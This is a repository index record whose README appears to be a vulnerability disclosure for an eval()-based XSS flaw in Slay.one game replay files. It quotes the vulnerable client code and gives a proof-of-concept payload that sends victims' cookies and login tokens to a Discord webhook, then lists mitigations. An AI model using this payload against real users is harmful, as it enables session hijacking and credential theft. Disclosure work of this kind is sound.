{"id":26187633,"url":"https://github.com/slay-one-devs/dbg-expliot","last_synced_at":"2026-03-11T09:07:19.329Z","repository":{"id":270419941,"uuid":"909772428","full_name":"Slay-One-Devs/dbg-expliot","owner":"Slay-One-Devs","description":"This repository documents a vulnerability, for cross-site scripting (XSS) attacks, in Slay.one's, a popular web-based pixel shooter game, replay files.","archived":false,"fork":false,"pushed_at":"2025-02-18T17:53:22.000Z","size":109,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":0,"default_branch":"main","last_synced_at":"2025-12-19T18:50:05.254Z","etag":null,"topics":["cve","expliot","javascript","slay-one","webpack","xss-vulnerability"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Slay-One-Devs.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2024-12-29T18:20:47.000Z","updated_at":"2025-02-22T21:19:45.000Z","dependencies_parsed_at":null,"dependency_job_id":"e025619d-9bcc-4d46-91fc-6cceca6a5b20","html_url":"https://github.com/Slay-One-Devs/dbg-expliot","commit_stats":null,"previous_names":["slay-one-devs/dbg-expliot"],"tags_count":0,"template":false,"template_full_name":null,"purl":"pkg:github/Slay-One-Devs/dbg-expliot","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slay-One-Devs%2Fdbg-expliot","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slay-One-Devs%2Fdbg-expliot/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slay-One-Devs%2Fdbg-expliot/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slay-One-Devs%2Fdbg-expliot/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Slay-One-Devs","download_url":"https://codeload.github.com/Slay-One-Devs/dbg-expliot/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Slay-One-Devs%2Fdbg-expliot/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30376810,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-11T06:09:32.197Z","status":"ssl_error","status_checked_at":"2026-03-11T06:09:17.086Z","response_time":84,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["cve","expliot","javascript","slay-one","webpack","xss-vulnerability"],"created_at":"2025-03-11T23:50:41.426Z","updated_at":"2026-03-11T09:07:19.310Z","avatar_url":"https://github.com/Slay-One-Devs.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"\n\u003cdiv align=\"center\"\u003e\n  \u003cimg src=\"./imgs/logo.png\" alt=\"Logo\" /\u003e\n\u003c/div\u003e\n\n# Exploit Report 'dbg' \n12/29/24\\\nThis repository documents a vulnerability, for cross-site scripting (XSS) attacks, in Slay.one's, a popular web-based pixel shooter game, replay files.\n\n## Introduction \n[Slay.one](https://slay.one) is a popular web-based, top-down pixel shooter game. Despite its engaging gameplay, it suffers from a serious vulnerability that exposes users to cross-site scripting (XSS) attacks. This report outlines the nature of the vulnerability, how it can be exploited, and recommendations for mitigating the risk.\n\n## Proof of Concept (PoC)\nThe vulnerability resides in the `client-bundle.js` file, specifically in the code responsible for processing WebSocket messages from the server. The problematic section of code is as follows:\n\n```javascript\nelse if (\"dbg\" === arr[0]) // 'dbg' packet sent from the server\n    try {\n        eval(msg.substring(4)); // eval() allows arbitrary code execution\n    } catch (e) {}\n```\n\nHere, the use of `eval()` poses a critical security risk, as it allows the execution of arbitrary JavaScript code passed within WebSocket messages.\n\n### Exploitation\nAttackers can exploit this vulnerability using Slay.one's replay feature, which lets users download and upload game replays. A replay file can be modified to include malicious code that executes in the victim’s browser when the file is uploaded and viewed.\n\n### Proof of Concept Code\nThe following example demonstrates how an attacker could edit a replay file to exploit this vulnerability. When the replay is loaded, the malicious code steals the user’s cookies and authentication tokens, sending them to a Discord webhook.\n\n#### Malicious Code Example\n```javascript\ndbg$fetch('https://discord.com/api/webhooks/{webhookID}/{webhookToken}', {\n    method: 'POST',\n    headers: { 'Content-Type': 'application/json' },\n    body: JSON.stringify({\n        content: 'Stolen Cookies: ' + document.cookie + \n                 ' Login Token: ' + localStorage.autologin\n    })\n});\n```\n\n### Potential Effects\nExploiting this vulnerability allows attackers to:\n- **Hijack user sessions**: Stolen cookies can be used to impersonate users.\n- **Steal sensitive information**: Attackers can access authentication tokens stored in `localStorage`.\n- **Execute arbitrary code**: This can lead to additional compromises, including malware delivery or unauthorized actions.\n\n## Recommendations for Mitigation\nTo address this vulnerability and improve overall security, the following measures are recommended:\n\n- **Eliminate `eval()` usage**: \n- **Validate and sanitize inputs**\n- **Implement Content Security Policy (CSP)**\n- **Enhance WebSocket security**: \n\n---\n\nBy implementing these measures, Slay.one can significantly reduce the risk of XSS attacks, providing a safer and more secure experience for its players.\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fslay-one-devs%2Fdbg-expliot","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fslay-one-devs%2Fdbg-expliot","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fslay-one-devs%2Fdbg-expliot/lists"}